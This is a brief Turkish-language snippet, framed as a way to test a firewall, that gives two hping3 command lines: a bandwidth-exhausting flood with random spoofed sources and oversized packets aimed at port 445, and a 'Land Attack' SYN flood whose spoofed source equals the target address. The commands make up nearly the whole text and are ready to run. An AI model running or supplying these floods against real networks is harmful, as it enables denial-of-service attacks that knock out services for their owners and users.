Testing firewall performance with Hping3
Firewall'unuzu bir test edin :) * Bandı bitirmelik
hping3 -2 -S --rand-source 192.168.1.1 -p 445 -w 64 -I eth0 --flood -x -d 99999 -e "deneme" * Land Attack
hping3 -S --flood -c 1000000 -I eth0 -w 64 -s 80 -p 80 -a 192.168.1.1 192.168.1.1










